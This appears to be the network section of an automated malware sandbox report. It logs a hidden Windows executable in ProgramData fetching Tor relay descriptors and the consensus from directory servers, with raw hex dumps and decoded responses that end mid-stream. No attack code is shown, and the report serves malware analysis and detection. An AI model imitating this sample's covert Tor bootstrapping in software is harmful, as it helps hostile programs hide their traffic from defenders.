51 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 62 3a 66 34 63 32 3a 31 3a 3a 31 37 33 5d 3a 31 31 31 37 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 37 3a 34 35 3a 34 38 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 37 41 37 32 20 44 41 33 31 20 32 37 42 45 20 30 39 41 38 20 30 32 32 35 20 35 41 36 30 20 30 43 44 30 20 42 34 45 39 20 37 37 38 35 20 46 35 46 44 0a 75 70 74 69 6d 65 20 31 30 38 30 31 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 35 35 30 34 33 38 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 30 32 39 37 44 37 30 43 36 37 35 34 39 37 36 38 30 39 46 30 39 34 41 30 33 36 45 30 45 37 42 44 33 30 45 43 30 45 45 46 20 34 57 4d 51 6e 34 76 62 42 4e 66 45 46 4f 39 31 32 31 53 79 33 56 6a 79 2b 6c 4a 7a 69 4b 32 6e 6c 6e 4d 67 67 2f 31 6a 77 74 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 7a 4f 31 34 63 76 52 5a 52 4f 32 49 4e 57 67 54 57 70 6a 52 42 4e 64 52 37 66 76 71 45 36 6e 56 50 6e 73 43 32 46 42 52 4f 34 38 70 2f 79 52 7a 68 66 4d 51 43 57 0a 5a 6f 64 2f 54 76 77 76 63 33 70 59 32 70 66 4f 42 75 6a 73 32 38 6c 4c 51 66 32 57 65 4b 31 32 74 46 6f 4a 46 75 73 4b 37 76 32 41 42 61 76 2b 6d 39 31 2b 49 51 61 6b 51 66 78 6c 41 64 4d 66 0a 77 74 62 42 42 70 64 4f 39 62 4e 71 2b 47 6c 69 73 55 7a 43 36 51 58 4d 62 38 6f 71 6f 46 33 77 45 2b 4f 50 76 70 59 56 47 2f 4b 56 55 4d 6f 7a 79 76 75 48 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                      Data Ascii: router relayon1173 185.220.101.173 11173 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxqiAemf3ubQT388vR0Lh8bGDs8ncvT0Fx94ffb1goyz9ZzsAQAgBACMwQvt3mi1xlseKhhM5wCMoRJBxvoHevpOSaX3nq/YpGNxuV3DyAvg0Ws5AZDowRiZeuQd7k8+mK6m1VBf/zV8Tr2kXZBClKkWTK/c3o0x1AR3MQRh+Weiar2r1bU6ygM=-----END ED25519 CERT-----master-key-ed25519 jMEL7d5otcZbHioYTOcAjKESQcb6B3r6Tkml956v2KQor-address [2a0b:f4c2:1::173]:11173platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 17:45:48fingerprint 7A72 DA31 27BE 09A8 0225 5A60 0CD0 B4E9 7785 F5FDuptime 10801bandwidth 1073741824 1073741824 15504384extra-info-digest 0297D70C6754976809F094A036E0E7BD30EC0EEF 4WMQn4vbBNfEFO9121Sy3Vjy+lJziK2nlnMgg/1jwt8onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKzO14cvRZRO2INWgTWpjRBNdR7fvqE6nVPnsC2FBRO48p/yRzhfMQCWZod/Tvwvc3pY2pfOBujs28lLQf2WeK12tFoJFusK7v2ABav+m91+IQakQfxlAdMfwtbBBpdO9bNq+GlisUzC6QXMb8oqoF3wE+OPvpYVG/KVUMozyvuHAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      26192.168.2.54973624.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:48.498742104 CET2867OUTGET /tor/server/fp/3239007ce1fb2ecdfdf2067df23b949295dc5ef6 HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:49.397876978 CET2869INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:49 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:49 GMT
                      Data Raw: 72 6f 75 74 65 72 20 54 4f 52 32 44 46 4e 30 31 61 20 32 31 37 2e 31 38 32 2e 31 39 38 2e 38 30 20 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 75 33 41 54 2b 6e 48 78 50 70 58 61 49 74 51 67 6f 71 41 42 6f 53 43 46 4b 6b 2f 6d 41 6b 63 55 49 58 45 2f 52 70 4f 35 4f 33 47 6c 63 57 41 51 41 67 42 41 43 39 2b 34 6c 6b 0a 63 30 4f 32 6e 4b 6f 79 49 75 6d 49 6e 62 6b 47 73 48 79 37 63 32 78 69 51 4c 68 4c 56 50 79 65 43 4c 62 71 74 58 56 48 75 30 49 71 45 5a 68 7a 74 66 35 79 65 5a 41 58 65 44 6b 4b 75 61 50 32 0a 77 6c 71 73 46 59 69 32 76 6f 76 72 4a 4d 59 75 48 57 57 4b 59 77 62 4f 70 4c 50 53 65 68 4f 78 73 4b 4e 51 58 48 38 61 41 30 41 4e 4e 74 63 62 41 6d 33 46 7a 35 43 73 6b 41 67 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 76 66 75 4a 5a 48 4e 44 74 70 79 71 4d 69 4c 70 69 4a 32 35 42 72 42 38 75 33 4e 73 59 6b 43 34 53 31 54 38 6e 67 69 32 36 72 55 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 46 72 65 65 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 30 36 3a 35 34 3a 31 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 32 33 39 20 30 30 37 43 20 45 31 46 42 20 32 45 43 44 20 46 44 46 32 20 30 36 37 44 20 46 32 33 42 20 39 34 39 32 20 39 35 44 43 20 35 45 46 36 0a 75 70 74 69 6d 65 20 35 30 34 30 30 34 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 34 32 39 37 35 38 30 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 31 30 36 33 38 46 34 35 43 34 35 36 38 45 31 45 33 46 45 43 38 43 42 42 43 44 46 42 45 39 38 43 45 45 30 32 37 32 31 20 37 6a 47 4d 5a 4e 37 70 6f 30 4a 32 30 56 59 30 56 74 54 71 42 46 79 31 45 34 5a 41 70 63 6e 74 46 79 75 4a 63 49 48 52 44 45 49 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 6e 6f 65 7a 53 6c 65 64 42 56 67 65 2f 75 70 35 6a 38 32 72 64 74 4c 4e 6a 36 75 36 57 78 64 44 6c 56 6c 45 6a 61 75 45 69 53 64 35 78 7a 69 48 4a 74 6d 57 51 64 0a 48 63 54 5a 79 43 38 70 30 6c 4d 74 69 4c 71 48 73 6d 4f 6c 76 6f 43 2b 72 6a 48 69 55 64 62 44 34 76 4f 33 62 30 6b 65 58 4f 51 4f 6f 61 68 79 6c 35 79 54 38 39 34 77 6a 66 32 4b 4f 37 77 55 0a 55 54 5a 67 7a 6f 49 70 76 49 48 49 2f 57 6d 54 33 74 4b 51 62 62 37 77 4a 45 73 47 74 79 6a 78 32 43 43 44 39 4d 53 6c 56 35 30 46 59 4f 39 66 6a 78 6f 7a 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 41 64 43 62
                      Data Ascii: router TOR2DFN01a 217.182.198.80 443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxu3AT+nHxPpXaItQgoqABoSCFKk/mAkcUIXE/RpO5O3GlcWAQAgBAC9+4lkc0O2nKoyIumInbkGsHy7c2xiQLhLVPyeCLbqtXVHu0IqEZhztf5yeZAXeDkKuaP2wlqsFYi2vovrJMYuHWWKYwbOpLPSehOxsKNQXH8aA0ANNtcbAm3Fz5CskAg=-----END ED25519 CERT-----master-key-ed25519 vfuJZHNDtpyqMiLpiJ25BrB8u3NsYkC4S1T8ngi26rUplatform Tor 0.4.7.13 on FreeBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 06:54:17fingerprint 3239 007C E1FB 2ECD FDF2 067D F23B 9492 95DC 5EF6uptime 504004bandwidth 1073741824 1073741824 42975804extra-info-digest F10638F45C4568E1E3FEC8CBBCDFBE98CEE02721 7jGMZN7po0J20VY0VtTqBFy1E4ZApcntFyuJcIHRDEIonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALnoezSledBVge/up5j82rdtLNj6u6WxdDlVlEjauEiSd5xziHJtmWQdHcTZyC8p0lMtiLqHsmOlvoC+rjHiUdbD4vO3b0keXOQOoahyl5yT894wjf2KO7wUUTZgzoIpvIHI/WmT3tKQbb7wJEsGtyjx2CCD9MSlV50FYO9fjxozAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANAdCb


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      27192.168.2.549738131.188.40.18980C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:54.705429077 CET2882OUTGET /tor/status-vote/current/consensus HTTP/1.0
                      Host: 131.188.40.189
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:54.726679087 CET2883INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:54 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Thu, 09 Feb 2023 01:00:00 GMT
                      Vary: X-Or-Diff-From-Consensus
                      Data Raw: 6e 65 74 77 6f 72 6b 2d 73 74 61 74 75 73 2d 76 65 72 73 69 6f 6e 20 33 0a 76 6f 74 65 2d 73 74 61 74 75 73 20 63 6f 6e 73 65 6e 73 75 73 0a 63 6f 6e 73 65 6e 73 75 73 2d 6d 65 74 68 6f 64 20 33 32 0a 76 61 6c 69 64 2d 61 66 74 65 72 20 32 30 32 33 2d 30 32 2d 30 39 20 30 30 3a 30 30 3a 30 30 0a 66 72 65 73 68 2d 75 6e 74 69 6c 20 32 30 32 33 2d 30 32 2d 30 39 20 30 31 3a 30 30 3a 30 30 0a 76 61 6c 69 64 2d 75 6e 74 69 6c 20 32 30 32 33 2d 30 32 2d 30 39 20 30 33 3a 30 30 3a 30 30 0a 76 6f 74 69 6e 67 2d 64 65 6c 61 79 20 33 30 30 20 33 30 30 0a 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 35 2e 31 36 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 2c 30 2e 34 2e 37 2e 31 33 0a 73 65 72 76 65 72 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 35 2e 31 36 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 2c 30 2e 34 2e 37 2e 31 33 0a 6b 6e 6f 77 6e 2d 66 6c 61 67 73 20 41 75 74 68 6f 72 69 74 79 20 42 61 64 45 78 69 74 20 45 78 69 74 20 46 61 73 74 20 47 75 61 72 64 20 48 53 44 69 72 20 4d 69 64 64 6c 65 4f 6e 6c 79 20 4e 6f 45 64 43 6f 6e 73 65 6e 73 75 73 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 53 74 61 6c 65 44 65 73 63 20 53 79 62 69 6c 20 56 32 44 69 72 20 56 61 6c 69 64 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 4c 69 6e 6b 3d 34 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 70 61 72 61 6d 73 20 43 69 72 63 75 69 74 50 72 69 6f 72 69 74 79 48 61 6c 66 6c 69 66 65 4d 73 65 63 3d 33 30 30 30 30 20 44 6f 53 43 69
                      Data Ascii: network-status-version 3vote-status consensusconsensus-method 32valid-after 2023-02-09 00:00:00fresh-until 2023-02-09 01:00:00valid-until 2023-02-09 03:00:00voting-delay 300 300client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Validrecommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2params CircuitPriorityHalflifeMsec=30000 DoSCi
                      Feb 9, 2023 01:01:54.726731062 CET2884INData Raw: 72 63 75 69 74 43 72 65 61 74 69 6f 6e 42 75 72 73 74 3d 36 30 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 45 6e 61 62 6c 65 64 3d 31 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 4d 69 6e 43 6f 6e 6e 65 63 74 69 6f 6e 73
                      Data Ascii: rcuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConnections=2 DoSCircuitCreationRate=2 DoSConnectionEnabled=1 DoSConnectionMaxConcurrentCount=50 DoSRefuseSingleHopClientRendezvous=1 ExtendByEd25519ID=1 KISTSchedRunInterv
                      Feb 9, 2023 01:01:54.726758957 CET2885INData Raw: 75 61 72 64 2d 6e 2d 70 72 69 6d 61 72 79 2d 67 75 61 72 64 73 2d 74 6f 2d 75 73 65 3d 32 20 68 73 5f 73 65 72 76 69 63 65 5f 6d 61 78 5f 72 64 76 5f 66 61 69 6c 75 72 65 73 3d 31 20 68 73 64 69 72 5f 73 70 72 65 61 64 5f 73 74 6f 72 65 3d 34 20
                      Data Ascii: uard-n-primary-guards-to-use=2 hs_service_max_rdv_failures=1 hsdir_spread_store=4 overload_onionskin_ntor_period_secs=10800 overload_onionskin_ntor_scale_percent=500 sendme_emit_min_version=1shared-rand-previous-value 7 iHGU+U0HWiOZwyB5pXIHav
                      Feb 9, 2023 01:01:54.726784945 CET2886INData Raw: 64 62 65 72 67 20 3c 6c 69 6e 75 73 40 6e 6f 72 64 62 65 72 67 2e 73 65 3e 0a 76 6f 74 65 2d 64 69 67 65 73 74 20 33 44 39 43 31 36 38 36 30 44 34 45 31 30 38 45 31 32 41 37 38 35 46 41 46 38 46 41 45 30 43 46 42 34 35 41 32 35 35 44 0a 64 69 72
                      Data Ascii: dberg <linus@nordberg.se>vote-digest 3D9C16860D4E108E12A785FAF8FAE0CFB45A255Ddir-source dizum E8A9C45EDE6D711294FADF8E7951F4DE6CA56B58 45.66.33.45 45.66.33.45 80 443contact email:usura[]sabotage.org url:https://386bsd.net proof:uri-rsa abus
                      Feb 9, 2023 01:01:54.726814032 CET2888INData Raw: 6c 65 20 56 32 44 69 72 20 56 61 6c 69 64 0a 76 20 54 6f 72 20 30 2e 34 2e 37 2e 31 32 0a 70 72 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32
                      Data Ascii: le V2Dir Validv Tor 0.4.7.12pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=17000p accept 20-21,23,43,53,79-81,88,110,143,194,220,389,443,464-46
                      Feb 9, 2023 01:01:54.726841927 CET2889INData Raw: 2c 36 34 37 33 38 0a 72 20 66 72 65 65 64 6f 6d 72 75 6e 6e 65 72 20 41 42 48 33 34 32 63 30 31 6d 48 6f 4f 73 30 74 64 6c 4f 6a 65 57 71 52 50 58 63 20 4e 2b 67 69 71 58 48 32 39 77 63 79 56 50 6c 4e 52 6d 76 69 39 4e 63 61 44 71 41 20 32 30 32
                      Data Ascii: ,64738r freedomrunner ABH342c01mHoOs0tdlOjeWqRPXc N+giqXH29wcyVPlNRmvi9NcaDqA 2023-02-08 21:04:56 198.98.61.11 9001 0s Fast Guard Running Stable V2Dir Validv Tor 0.4.5.16pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1 HSDir=2 HSIntro=4-5 HSRend
                      Feb 9, 2023 01:01:54.726869106 CET2890INData Raw: 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 77 20 42 61 6e 64 77 69 64 74 68 3d 36 31 30 0a 70 20 72 65 6a 65 63 74 20 31 2d 36 35 35 33 35 0a 72 20 46 6f 72 50 72 69 76 61 63 79 4e 45
                      Data Ascii: Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=610p reject 1-65535r ForPrivacyNET ADb6NqtDX9XQ9kBiZjaGfr+3LGg eOtHE9WLZr0ZF8fn0AqGjY1DF1s 2023-02-08 23:30:21 185.220.101.33 10133 0a [2a0b:f4c2:2::33]:10133s Exit Fast Guard HSDir Running St
                      Feb 9, 2023 01:01:54.726898909 CET2892INData Raw: 2e 34 2e 37 2e 31 33 0a 70 72 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d
                      Data Ascii: .4.7.13pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=5800p reject 1-65535r Athena AF7ZchP3JYZ+QiuNwEQzYbuyTjw 4SAxfFc8g87vx452QTcc3366Re0 2023
                      Feb 9, 2023 01:01:54.726922989 CET2893INData Raw: 7a 33 59 6a 55 20 32 30 32 33 2d 30 32 2d 30 38 20 32 31 3a 33 37 3a 32 39 20 32 30 30 2e 32 35 2e 31 36 2e 37 37 20 34 34 33 20 30 0a 73 20 45 78 69 74 20 46 61 73 74 20 47 75 61 72 64 20 48 53 44 69 72 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c
                      Data Ascii: z3YjU 2023-02-08 21:37:29 200.25.16.77 443 0s Exit Fast Guard HSDir Running Stable V2Dir Validv Tor 0.4.7.12pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4
                      Feb 9, 2023 01:01:54.726950884 CET2894INData Raw: 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 77 20 42 61 6e 64 77 69 64 74 68 3d 31 33 30 30 30 0a 70 20 61 63 63 65 70
                      Data Ascii: Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=13000p accept 20-21,43,53,79-81,88,110,143,220,389,443,464,531,543-544,554,636,706,749,873,902-904,981,989-993,995,1194,1220,1293,1500,1533,1677,1723,1755,1863,2083,2086-208
                      Feb 9, 2023 01:01:54.748109102 CET2896INData Raw: 31 38 2c 31 31 33 37 31 2c 31 39 32 39 34 2c 35 30 30 30 32 2c 36 34 37 33 38 0a 72 20 6d 68 61 72 65 6c 61 79 20 41 4c 56 37 39 68 54 33 37 54 42 52 42 7a 74 64 52 53 62 2f 43 79 4f 76 49 58 73 20 5a 4f 77 2f 4e 6c 44 38 31 52 44 42 48 6b 64 54
                      Data Ascii: 18,11371,19294,50002,64738r mharelay ALV79hT37TBRBztdRSb/CyOvIXs ZOw/NlD81RDBHkdTuEzFw+h1i54 2023-02-08 12:22:27 158.174.145.139 9001 0a [2001:9b1:403c:0:ffff:d3da:5c99:8455]:9001s Fast Guard Running Stable V2Dir Validv Tor 0.4.7.13pr Con


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.54970362.35.195.879030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:00:21.193659067 CET2615OUTGET /tor/server/fp/00c2b794f74b8759d26786ee363009c9c59088f5 HTTP/1.0
                      Host: 62.35.195.87
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:00:21.351826906 CET2615INHTTP/1.0 503 Directory busy, try again later
                      Date: Thu, 09 Feb 2023 00:00:21 GMT


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.549706116.203.195.429030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:00:31.829341888 CET2621OUTGET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0
                      Host: 116.203.195.42
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:00:31.852750063 CET2622INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:00:31 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:00:31 GMT
                      Data Raw: 72 6f 75 74 65 72 20 49 4e 53 52 65 6c 61 79 33 35 61 74 38 34 34 33 20 31 34 30 2e 37 38 2e 31 30 30 2e 33 35 20 38 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 76 61 41 62 78 72 38 6a 36 75 4b 35 43 76 49 61 4a 4b 4b 74 4c 4f 37 5a 6f 46 48 59 76 47 63 6e 68 6f 77 63 49 42 30 72 63 54 52 62 42 67 41 51 41 67 42 41 44 75 46 55 79 32 0a 75 45 7a 71 61 46 41 58 6e 51 67 6f 67 39 5a 76 71 41 54 53 6e 31 32 72 6b 77 2b 70 46 32 41 76 2f 72 47 65 75 59 47 41 78 79 7a 61 74 70 4a 59 68 4d 66 51 2f 33 74 4c 6a 37 31 57 71 31 6c 72 0a 49 6a 51 6d 6e 66 50 4c 72 4c 33 69 77 43 44 2b 4d 4b 70 73 56 2f 34 43 6b 72 31 39 37 58 33 35 30 41 67 